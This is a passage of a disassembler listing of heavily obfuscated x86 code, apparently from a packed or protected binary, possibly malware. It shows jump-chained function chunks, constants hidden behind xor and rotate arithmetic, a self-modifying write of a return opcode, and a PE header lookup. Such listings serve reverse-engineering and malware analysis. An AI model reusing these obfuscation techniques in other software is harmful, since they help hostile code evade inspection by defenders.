cmp dword ptr [eax], 0
jnz loc_42CDEC
jmp loc_42C434
; END OF FUNCTION CHUNK FOR sub_423DFC
; ---------------------------------------------------------------------------
loc_42E61C: ; CODE XREF: _7hdaygc1:004254A5�j
jo loc_4292FB
test eax, 7FD6D82Fh
jmp loc_428D97
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428B11
loc_42E62D: ; CODE XREF: sub_428B11-18CE�j
and edx, 8BF8CFDBh
jmp loc_4295C9
; END OF FUNCTION CHUNK FOR sub_428B11
; ---------------------------------------------------------------------------
loc_42E638: ; CODE XREF: _7hdaygc1:0042F4C9�j
js loc_42A4F8
push 0DE02C54Ch
jmp sub_428371
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429A26
loc_42E648: ; CODE XREF: sub_429A26:loc_42C874�j
mov edx, [ebp+arg_4]
mov [edx-10h], eax
inc [ebp+var_4]
call sub_426D10
loc_42E656: ; CODE XREF: sub_42B4DE:loc_424D14�j
xor ecx, 4DE05568h
rol ecx, 1Ch
xor ecx, 7FA027F3h
push offset loc_4232AF
jmp loc_427ED3
; END OF FUNCTION CHUNK FOR sub_429A26
; ---------------------------------------------------------------------------
mov [edx], esi
jmp loc_428BD4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4232C2
loc_42E676: ; CODE XREF: sub_4232C2+A12B�j
jl loc_42B7B0
loc_42E67C: ; CODE XREF: sub_4232C2:loc_42E25A�j
mov edi, eax
push 0EF1B00D9h
pop eax
xor eax, 0E6C69A98h
jmp loc_423B13
; END OF FUNCTION CHUNK FOR sub_4232C2
; ---------------------------------------------------------------------------
loc_42E68F: ; CODE XREF: _7hdaygc1:004289EA�j
jl loc_42603A
; =============== S U B R O U T I N E =======================================
sub_42E695 proc near ; CODE XREF: sub_42F03C-5146�p
; FUNCTION CHUNK AT 00423B5B SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00424B2A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00425A2A SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00425B5D SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00425CF8 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042C381 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042EA34 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042EC9D SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042F1B1 SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
mov esp, ebp
pop ebp
jmp loc_42C381
sub_42E695 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425735
loc_42E6A1: ; CODE XREF: sub_425735+63FA�j
mov ecx, [ebx+edx-8]
or ecx, ecx
jz loc_427E44
call sub_42E3A4
jmp loc_42C746
; END OF FUNCTION CHUNK FOR sub_425735
; ---------------------------------------------------------------------------
loc_42E6B7: ; DATA XREF: sub_42AB0F-590D�o
add esi, 7940BBF6h
add eax, esi
pop esi
mov eax, [eax]
mov al, [ebp+eax-20h]
push 0FA985854h
loc_42E6CB: ; CODE XREF: _7hdaygc1:loc_429266�j
jmp loc_429AC0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42742E
loc_42E6D0: ; CODE XREF: sub_42742E+12�j
jz loc_424C3C
jmp loc_427281
; END OF FUNCTION CHUNK FOR sub_42742E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426CBB
loc_42E6DB: ; CODE XREF: sub_426CBB:loc_423F94�j
push edi
mov edi, ebx
xchg edi, [esp+4+var_4]
jmp loc_428530
; END OF FUNCTION CHUNK FOR sub_426CBB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F02
loc_42E6E6: ; CODE XREF: sub_423F02�j
mov eax, ds:dword_42B9A0
or eax, eax
jnz loc_423B92
jmp loc_4262AA
; END OF FUNCTION CHUNK FOR sub_423F02
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EBD6
loc_42E6F9: ; CODE XREF: sub_42EBD6-4834�j
add [esi], eax
push esi
push offset loc_42C5B1
jmp nullsub_159
; END OF FUNCTION CHUNK FOR sub_42EBD6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425C3B
loc_42E706: ; CODE XREF: sub_425C3B-13B1�j
pop ebx
add dword ptr [ebp-4], 4
push 49F69D6Ch
pop eax
sub eax, ds:4000F1h
jmp loc_428422
; END OF FUNCTION CHUNK FOR sub_425C3B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425A37
loc_42E71C: ; CODE XREF: sub_425A37:loc_424E3D�j
jz loc_42E83F
jmp loc_42DAF2
; END OF FUNCTION CHUNK FOR sub_425A37
; ---------------------------------------------------------------------------
test edx, 8CAD2F73h
jmp loc_4288C1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_180. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42E733: ; CODE XREF: _7hdaygc1:00423AFE�j
jmp loc_42B8D3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D84A
loc_42E738: ; CODE XREF: sub_42D84A+BAC�j
push 0AC2A1A80h
xchg ecx, [esp+10h+var_10]
mov edx, ecx
pop ecx
sub edx, 43940A76h
or edx, 9B7BCAB5h
cmp edx, 244B38Fh
jmp loc_424B4D
; END OF FUNCTION CHUNK FOR sub_42D84A
; ---------------------------------------------------------------------------
locret_42E75A: ; CODE XREF: _7hdaygc1:0042B8ED�j
retn
; ---------------------------------------------------------------------------
loc_42E75B: ; DATA XREF: sub_4270E6-388D�o
push 446DB671h
xchg ecx, [esp]
mov esi, ecx
pop ecx
or esi, 0B6F436E2h
jmp loc_429208
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C50D
loc_42E771: ; CODE XREF: sub_42C50D-8C92�j
or ebx, ecx
jmp loc_424F50
; END OF FUNCTION CHUNK FOR sub_42C50D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_156. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E076
loc_42E779: ; CODE XREF: sub_42E076-8C9C�j
jmp nullsub_91
; END OF FUNCTION CHUNK FOR sub_42E076
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA47
loc_42E77E: ; CODE XREF: sub_42AA47-5982�j
jmp loc_42C439
; END OF FUNCTION CHUNK FOR sub_42AA47
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A462
loc_42E783: ; CODE XREF: sub_42A462+534E�j
add esi, 5A010B34h
mov esi, [esi]
push offset sub_42BB83
jmp loc_423BA5
; END OF FUNCTION CHUNK FOR sub_42A462
; ---------------------------------------------------------------------------
call nullsub_208
mov dword ptr [ebp-4], 1
mov eax, 0
or eax, eax
jz loc_42327A
jmp loc_4270C9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425D85
loc_42E7B3: ; CODE XREF: sub_425D85:loc_42BEC1�j
mov ebp, ebx
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_425D85
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B510
loc_42E7B7: ; CODE XREF: sub_42B510+8�j
jmp loc_42382D
; END OF FUNCTION CHUNK FOR sub_42B510
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42911B
loc_42E7BC: ; CODE XREF: sub_42911B-59CE�j
jmp loc_42A7EF
; END OF FUNCTION CHUNK FOR sub_42911B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AFFE
loc_42E7C1: ; CODE XREF: sub_42AFFE-5A2F�j
call sub_42E283
jmp sub_42D503
; ---------------------------------------------------------------------------
loc_42E7CB: ; CODE XREF: sub_42AFFE+5BA�j
add eax, ebp
add eax, 0E89B7121h
mov eax, [eax]
push eax
jmp loc_424834
; END OF FUNCTION CHUNK FOR sub_42AFFE
; ---------------------------------------------------------------------------
and eax, 63A3EA77h
jmp loc_42ABF5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424F62
loc_42E7E6: ; CODE XREF: sub_424F62+5D07�j
jnp loc_4291DB
and edx, esi
test eax, ecx
jmp loc_42CF2A
; END OF FUNCTION CHUNK FOR sub_424F62
; =============== S U B R O U T I N E =======================================
sub_42E7F5 proc near ; CODE XREF: sub_42D8FB�j
; DATA XREF: sub_42D8CD+D�o
jz loc_4282F3
mov dword ptr [ebp-8], 1
sub_42E7F5 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_425D65
loc_42E802: ; CODE XREF: sub_425D65:loc_4271D2�j
; sub_425D65:loc_42C477�j
mov eax, [ebp-8]
pop ecx
pop ecx
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_425D65
; ---------------------------------------------------------------------------
loc_42E809: ; CODE XREF: _7hdaygc1:004248CA�j
jmp loc_42726C
; ---------------------------------------------------------------------------
loc_42E80E: ; CODE XREF: _7hdaygc1:004247CA�j
jmp locret_426990
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_188. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D757
loc_42E814: ; CODE XREF: sub_42D757+C�j
jmp loc_42C3CF
; END OF FUNCTION CHUNK FOR sub_42D757
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423DDB
loc_42E819: ; CODE XREF: sub_423DDB+9136�j
jmp sub_42AA07
; END OF FUNCTION CHUNK FOR sub_423DDB
; ---------------------------------------------------------------------------
loc_42E81E: ; CODE XREF: _7hdaygc1:00424154�j
jmp loc_426CCC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F467
loc_42E823: ; CODE XREF: sub_42F467+10�j
mov eax, esi
pop esi
or eax, 99F2BC4Eh
sub eax, 0E86F8239h
jmp loc_42CA50
; END OF FUNCTION CHUNK FOR sub_42F467
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C7F3
loc_42E837: ; CODE XREF: sub_42C7F3-620�j
add edi, edx
; END OF FUNCTION CHUNK FOR sub_42C7F3
; START OF FUNCTION CHUNK FOR sub_427EF6
loc_42E839: ; CODE XREF: sub_427EF6:loc_427FC1�j
and ebx, 0B81D1D2Eh
loc_42E83F: ; CODE XREF: sub_425A37:loc_42E71C�j
add dword ptr [esi], 0F80486h
loc_42E845: ; CODE XREF: sub_42AB9F-7AA0�j
; sub_4232DA+D92�j ...
xchg eax, [esp+0]
mov edi, eax
jmp loc_42369E
; END OF FUNCTION CHUNK FOR sub_427EF6
; =============== S U B R O U T I N E =======================================
sub_42E84F proc near ; DATA XREF: sub_423648+554D�o
mov edx, [ebp-20h]
movzx edx, byte ptr [edx]
or eax, edx
mov [ebp-1Ch], eax
jmp loc_42F127
sub_42E84F endp
; =============== S U B R O U T I N E =======================================
sub_42E85F proc near ; DATA XREF: sub_429318:loc_426577�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00423EC8 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004271DC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004291F8 SIZE 0000000B BYTES
lea eax, [ebp-10h]
call sub_42C16F
lea eax, [ebp-14h]
call sub_42C16F
push 5126D27Bh
xchg ebp, [esp+0]
jmp loc_423EC8
sub_42E85F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42E87C: ; CODE XREF: _7hdaygc1:00429B9A�j
popf
js loc_4281D2
loc_42E883: ; CODE XREF: _7hdaygc1:00429B83�j
add esi, 0C8C64C2h
xchg esi, [esp]
jmp loc_423E3E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424963
loc_42E891: ; CODE XREF: sub_424963+8BE6�j
or eax, 0AA384522h
jmp loc_42D3C7
; END OF FUNCTION CHUNK FOR sub_424963
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B470
loc_42E89C: ; CODE XREF: sub_42B470-7FC9�j
popf
rol ebp, 1Ah
jmp sub_42F56C
; END OF FUNCTION CHUNK FOR sub_42B470
; ---------------------------------------------------------------------------
loc_42E8A5: ; CODE XREF: _7hdaygc1:loc_42E5A4�j
lea eax, nullsub_2
mov byte ptr [eax], 0C3h
call sub_427DDA
; START OF FUNCTION CHUNK FOR sub_42AA11
loc_42E8B3: ; CODE XREF: sub_42AA11:loc_42913C�j
jmp sub_427D8E
; END OF FUNCTION CHUNK FOR sub_42AA11
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E076
loc_42E8B8: ; CODE XREF: sub_42E076-8EBD�j
jmp loc_42DD14
; END OF FUNCTION CHUNK FOR sub_42E076
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_35. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BE7D
loc_42E8BE: ; CODE XREF: sub_42BE7D-6865�j
add eax, 2
call sub_42AD16
loc_42E8C6: ; CODE XREF: sub_429318:loc_42C0FB�j
jmp loc_42AAD9
; END OF FUNCTION CHUNK FOR sub_42BE7D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C443
loc_42E8CB: ; CODE XREF: sub_42C443-2BE2�j
cmp esi, 0B29CB93Eh
jmp loc_42454B
; END OF FUNCTION CHUNK FOR sub_42C443
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F65A
loc_42E8D6: ; CODE XREF: sub_42F65A-5A58�j
xchg ebp, edx
jmp loc_42A750
; END OF FUNCTION CHUNK FOR sub_42F65A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4295F7
loc_42E8DD: ; CODE XREF: sub_4295F7:loc_42F257�j
jnz loc_4281AE
loc_42E8E3: ; CODE XREF: sub_42F979+12�j
jmp nullsub_190
; END OF FUNCTION CHUNK FOR sub_4295F7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DAD9
loc_42E8E8: ; CODE XREF: sub_42DAD9+7�j
jmp loc_42626B
; END OF FUNCTION CHUNK FOR sub_42DAD9
; ---------------------------------------------------------------------------
jo loc_429EED
jmp loc_4281AC
; ---------------------------------------------------------------------------
jb loc_42A6AD
jmp sub_42CAE1
; ---------------------------------------------------------------------------
mov [edx], edi
jmp sub_42BD03
; =============== S U B R O U T I N E =======================================
sub_42E90A proc near ; CODE XREF: sub_42F1E7�j
; DATA XREF: sub_42E4B2:loc_42F1DD�o
add esp, 0FFFFFFF8h
mov [ebp-8], edx
mov [ebp-4], eax
mov edx, [ebp-8]
jmp loc_42F61C
sub_42E90A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426DD9
loc_42E91B: ; CODE XREF: sub_426DD9:loc_42DDB0�j
add ebx, 1A4F3F5Ch
xor ebx, 0B7C4829Fh
rol ebx, 1Eh
add ebx, 0B7B10002h
popf
xchg ebx, [esp+4+var_4]
jmp sub_42D85F
; END OF FUNCTION CHUNK FOR sub_426DD9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424AE1
loc_42E939: ; CODE XREF: sub_424AE1:loc_4253E0�j
jl loc_42E55D
; END OF FUNCTION CHUNK FOR sub_424AE1
; START OF FUNCTION CHUNK FOR sub_42C369
loc_42E93F: ; CODE XREF: sub_42C369-50ED�j
jmp loc_426357
; END OF FUNCTION CHUNK FOR sub_42C369
; ---------------------------------------------------------------------------
xor esi, 0F83773F9h
jmp loc_42E555
; =============== S U B R O U T I N E =======================================
sub_42E94F proc near ; CODE XREF: sub_425492:loc_423D9E�p
; _7hdaygc1:0042DF62�j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00425F8C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426D74 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00428E2B SIZE 0000000C BYTES
xchg ecx, [esp+0]
pop ecx
lea edx, [ebp-14h]
mov eax, offset dword_42B9BC
call sub_42AA07
jmp loc_426D74
sub_42E94F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291EA
loc_42E965: ; CODE XREF: sub_4291EA+2436�j
not edx
cdq
jz loc_42FC0F
jmp loc_42D65B
; END OF FUNCTION CHUNK FOR sub_4291EA
; =============== S U B R O U T I N E =======================================
sub_42E973 proc near ; DATA XREF: sub_426A62+88F�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042412A SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00429EE0 SIZE 00000013 BYTES
mov ds:dword_42BC60, eax
loc_42E978: ; CODE XREF: sub_426008:loc_42BEBC�j
; _7hdaygc1:0042C621�j ...
push edx
mov edx, ebp
xchg edx, [esp+4+var_4]
push 68026240h
pop eax
rol eax, 18h
jmp loc_42412A
sub_42E973 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_34. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42828C
loc_42E98D: ; CODE XREF: sub_42828C+3955�j
jmp nullsub_94
; END OF FUNCTION CHUNK FOR sub_42828C
; ---------------------------------------------------------------------------
mov edx, 19CFC62Bh
push ecx
push 3483E488h
pop ecx
sub ecx, 0EEA49F86h
add ecx, 0BA635FDCh
xchg ecx, [esp]
jmp sub_42C1AF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A833
loc_42E9B2: ; CODE XREF: sub_42A833:loc_426161�j
add ecx, 252875FCh
mov [ecx], eax
pop ecx
retn
; END OF FUNCTION CHUNK FOR sub_42A833
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42837F
loc_42E9BC: ; CODE XREF: sub_42837F+3�j
jmp loc_4262D4
; END OF FUNCTION CHUNK FOR sub_42837F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F528
loc_42E9C1: ; CODE XREF: sub_42B470-2855�j
; sub_42F528+6�j
push offset loc_423BB5
jmp loc_426764
; END OF FUNCTION CHUNK FOR sub_42F528
; ---------------------------------------------------------------------------
loc_42E9CB: ; CODE XREF: _7hdaygc1:0042A7B0�j
pop edi
add edi, 7733E4C9h
xor edi, 70737A14h
add edi, 0AD31B6C7h
xchg edi, [esp]
jmp sub_4291EA
; ---------------------------------------------------------------------------
test ecx, 0DAE4B7CDh
jmp loc_4237E0
; ---------------------------------------------------------------------------
loc_42E9F1: ; CODE XREF: _7hdaygc1:00429F12�j
and edi, 57EC020Dh
add edi, 0FF963217h
push offset loc_423417
jmp loc_42CA0A
; ---------------------------------------------------------------------------
loc_42EA07: ; CODE XREF: _7hdaygc1:0042C949�j
push ecx
jnz loc_424FD0
jmp loc_42ED59
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ED2A
loc_42EA13: ; CODE XREF: sub_42ED2A:loc_4297C4�j
cmp byte ptr [eax], 0
jnz loc_42583E
mov eax, [ebp-8]
push offset loc_42A454
jmp sub_428A9B
; END OF FUNCTION CHUNK FOR sub_42ED2A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F3C8
loc_42EA29: ; CODE XREF: sub_42F3C8:loc_4242B1�j
push offset sub_424F62
jmp loc_423AEC
; END OF FUNCTION CHUNK FOR sub_42F3C8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_76. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E695
loc_42EA34: ; CODE XREF: sub_42E695-AB21�j
jmp loc_425CF8
; END OF FUNCTION CHUNK FOR sub_42E695
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425F27
loc_42EA39: ; CODE XREF: sub_425F27:loc_4299EF�j
jge loc_4254CC
loc_42EA3F: ; CODE XREF: sub_4296EF+3D7D�j
jmp loc_42353D
; END OF FUNCTION CHUNK FOR sub_425F27
; ---------------------------------------------------------------------------
and ebx, 2089C773h
xor esi, ebp
jmp loc_4254CC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_41. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42EA52: ; CODE XREF: _7hdaygc1:00428C06�j
jmp locret_42E5D5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424494
loc_42EA57: ; CODE XREF: sub_424494-140�j
jmp loc_427227
; END OF FUNCTION CHUNK FOR sub_424494
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_72. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CC45
loc_42EA5D: ; CODE XREF: sub_42CC45+9�j
mov [ebp-4], eax
call sub_42826A
loc_42EA65: ; CODE XREF: sub_42951D+1E0D�j
jmp sub_427D8E
; END OF FUNCTION CHUNK FOR sub_42CC45
; =============== S U B R O U T I N E =======================================
sub_42EA6A proc near ; CODE XREF: sub_425647:loc_423584�p
; sub_4295F7+24�j
; FUNCTION CHUNK AT 0042A0C0 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042A62B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E502 SIZE 0000000B BYTES
xchg ebx, [esp+0]
pop ebx
pop ebp
mov eax, ds:dword_423B18
or eax, eax
jnz loc_42A0C0
jmp loc_42E502
sub_42EA6A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BAE7
loc_42EA82: ; CODE XREF: sub_42BAE7-7F12�j
; sub_42D9E1:loc_4280F7�j
mov edx, [ebp+8]
or [edx-8], eax
jmp loc_42DC03
; ---------------------------------------------------------------------------
loc_42EA8D: ; CODE XREF: _7hdaygc1:loc_424771�j
; sub_42F05E-3EEB�j ...
cmp dword ptr [ebp-10h], 1
call sub_42C443
loc_42EA96: ; CODE XREF: _7hdaygc1:00426A82�j
jmp loc_423A97
; END OF FUNCTION CHUNK FOR sub_42BAE7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42409E
loc_42EA9B: ; CODE XREF: sub_42409E+7409�j
push offset loc_42C725
jmp loc_4297BF
; END OF FUNCTION CHUNK FOR sub_42409E
; ---------------------------------------------------------------------------
loc_42EAA5: ; CODE XREF: _7hdaygc1:loc_4259FE�j
shr esi, 0Ch
rol ecx, 1Bh
jmp loc_424077
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D30E
loc_42EAB0: ; CODE XREF: sub_42D30E-4F39�j
push 3755D502h
pop edi
add edi, 60D8B6D4h
xor edi, 0E21DAF53h
add eax, edi
call sub_42CB85
; END OF FUNCTION CHUNK FOR sub_42D30E
; START OF FUNCTION CHUNK FOR sub_424680
loc_42EAC9: ; CODE XREF: sub_424680:loc_42725C�j
sbb eax, 973378E9h
xor ebx, ecx
jp loc_426FA2
jmp loc_4244B0
; END OF FUNCTION CHUNK FOR sub_424680
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424B63
loc_42EADC: ; CODE XREF: sub_424B63:loc_42858E�j
jz loc_42C78F
loc_42EAE2: ; CODE XREF: sub_424B63+10�j
; _7hdaygc1:loc_426BA2�j
jnb loc_426D39
mov eax, [ebp-4]
call sub_42D287
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0
jle loc_42C78F
jmp loc_42469C
; END OF FUNCTION CHUNK FOR sub_424B63
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425E64
loc_42EB02: ; CODE XREF: sub_425E64+5815�j
jnz loc_42A54F
jmp loc_427290
; END OF FUNCTION CHUNK FOR sub_425E64
; =============== S U B R O U T I N E =======================================
sub_42EB0D proc near ; CODE XREF: sub_4253A0:loc_42721D�p
; sub_4232DA+3FB1�j
; FUNCTION CHUNK AT 00423D52 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00424440 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00426AD1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042A963 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042BB76 SIZE 0000000D BYTES
xchg ecx, [esp+0]
pop ecx
mov eax, [ebp-4]
add eax, 3Ch
mov eax, [eax]
add eax, [ebp-4]
add eax, 18h
jmp loc_426AD1
sub_42EB0D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42EB24 proc near ; CODE XREF: sub_42C763+3�j
; FUNCTION CHUNK AT 00423406 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423CED SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426ACB SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00428E71 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042B5BD SIZE 00000013 BYTES
add esp, 0FFFFFFE4h
jmp loc_423CED
sub_42EB24 endp
; =============== S U B R O U T I N E =======================================
sub_42EB2C proc near ; DATA XREF: sub_423D07�o
; FUNCTION CHUNK AT 0042A012 SIZE 00000005 BYTES
js sub_42C405
push ebp
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
jmp loc_42A012
sub_42EB2C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42EB3E proc near ; CODE XREF: _7hdaygc1:loc_424FDB�p
; _7hdaygc1:00426C97�j
xchg edi, [esp+0]
pop edi
push ebp
call sub_428B02
sub_42EB3E endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42AA47
loc_42EB48: ; CODE XREF: sub_42AA47+4A7B�j
jmp loc_424D04
; END OF FUNCTION CHUNK FOR sub_42AA47
; ---------------------------------------------------------------------------
loc_42EB4D: ; CODE XREF: _7hdaygc1:0042E303�j
jmp locret_42670B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E283
loc_42EB52: ; CODE XREF: sub_42E283-9ED6�j
jmp loc_42A9B5
; END OF FUNCTION CHUNK FOR sub_42E283
; ---------------------------------------------------------------------------
mov eax, ds:dword_423B1C
call sub_42B650
mov esp, ebp
push offset sub_428E4E
jmp loc_42DD22
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A6C3
loc_42EB6D: ; CODE XREF: sub_42A6C3+3BF5�j
; sub_42A6C3+3C06�j
or eax, 0A1BE4A9Eh
and eax, 0DEE732C8h
js loc_4267CF
; END OF FUNCTION CHUNK FOR sub_42A6C3
; START OF FUNCTION CHUNK FOR sub_42C763
loc_42EB7F: ; CODE XREF: sub_42C763+17�j
jmp loc_42C696
; END OF FUNCTION CHUNK FOR sub_42C763
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425D65
loc_42EB84: ; CODE XREF: sub_425D65+10�j
jmp loc_42D8BB
; END OF FUNCTION CHUNK FOR sub_425D65
; ---------------------------------------------------------------------------
add edi, 0DB230958h
jmp loc_4267C9
; ---------------------------------------------------------------------------
loc_42EB94: ; DATA XREF: _7hdaygc1:loc_429D44�o
mov dword ptr [ebp-30h], 3FFFh
; START OF FUNCTION CHUNK FOR sub_42AFFE
loc_42EB9B: ; CODE XREF: sub_42AFFE:loc_42A043�j
jb loc_42B597
mov eax, [ebp+var_30]
push eax
mov eax, [ebp+var_4]
call sub_429318
locret_42EBAD: ; CODE XREF: sub_4270E6-3888�j
retn
; END OF FUNCTION CHUNK FOR sub_42AFFE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C443
loc_42EBAE: ; CODE XREF: sub_42C443+1538�j
jmp loc_427088
; END OF FUNCTION CHUNK FOR sub_42C443
; =============== S U B R O U T I N E =======================================
sub_42EBB3 proc near ; CODE XREF: _7hdaygc1:0042403E�j
; sub_427DDA+7960�p
xchg esi, [esp+0]
pop esi
push eax
push ecx
call sub_426B62
sub_42EBB3 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42DD73
loc_42EBBE: ; CODE XREF: sub_42DD73+1DA�j
jmp loc_42AC22
; END OF FUNCTION CHUNK FOR sub_42DD73
; ---------------------------------------------------------------------------
loc_42EBC3: ; CODE XREF: _7hdaygc1:0042DD0F�j
mov esi, 0DE42800Dh
; =============== S U B R O U T I N E =======================================
sub_42EBC8 proc near ; CODE XREF: sub_425BCD+5602�p
; FUNCTION CHUNK AT 004245A6 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004245BE SIZE 0000002A BYTES
; FUNCTION CHUNK AT 004252DD SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
call sub_42DBEA
jmp loc_4245BE
sub_42EBC8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42EBD6 proc near ; CODE XREF: sub_424F62+122F�p
; _7hdaygc1:0042E461�j
; FUNCTION CHUNK AT 00423297 SIZE 0000002A BYTES
; FUNCTION CHUNK AT 00423464 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00423CA6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424A52 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004268AF SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042847A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042869D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042875E SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004288DD SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00428B55 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042975A SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042A394 SIZE 00000013 BYTES
